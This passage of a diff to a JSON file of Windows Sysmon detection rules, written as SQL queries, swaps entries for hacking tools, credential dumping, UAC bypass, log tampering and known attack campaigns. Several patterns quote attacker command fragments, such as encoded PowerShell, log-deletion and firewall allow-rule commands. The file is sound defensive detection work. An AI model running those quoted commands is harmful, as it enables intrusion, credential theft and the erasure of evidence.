LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Suspicious Execution From GUID Like Folder Names", - "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "status": "experimental", - "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Installers are sometimes known for creating temporary folders with GUID like names. 
Add appropriate filters accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\{%' ESCAPE '\\' AND Image LIKE '%}\\\\%' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the 
existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "HackTool - Quarks 
PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "status": "stable", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "status": "test", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": 
"Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Programs that use the same command line flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Wscript Execution from Non C Drive", - "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "title": "WMIC Remote Command Execution", + "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "status": "experimental", - "description": "Detects Wscript or Cscript executing from a drive other than C. 
This has been observed with Qakbot executing from within a mounted ISO file.", - "author": "Aaron Herman", + "description": "Detects the execution of WMIC to query information on a remote system", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Legitimate scripts located on other partitions such as \"D:\"" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" + "filename": "proc_creation_win_wmic_remote_execution.yml" }, { - "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", - "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", - "status": "experimental", - "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", - "author": "Florian Roth (Nextron Systems), Hieu Tran", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "status": "test", + "description": "Suspicious 
behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", + "tags": [ + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_download_dll.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "status": "test", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Unlikely" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Potential UAC Bypass Via Sdclt.EXE", + "id": "40f9af16-589d-4984-b78d-8c2aec023197", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "A General detection for sdclt being spawned 
as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1012", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1548.002" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_uac_bypass_sdclt.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha 
Marasinghe", + "title": "Psr.exe Capture Screenshots", + "id": "2158f96f-43c2-43cb-952a-ab4580f32382", + "status": "test", + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_psr_capture_screenshots.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": 
"proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", + "id": "47e4bab7-c626-47dc-967b-255608c9a920", + "status": "experimental", + "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": 
"proc_creation_win_findstr_recon_everyone.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1218.002", + "attack.persistence", + "attack.t1546" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR 
OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", "attack.defense_evasion", - "attack.t1562.004" + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) 
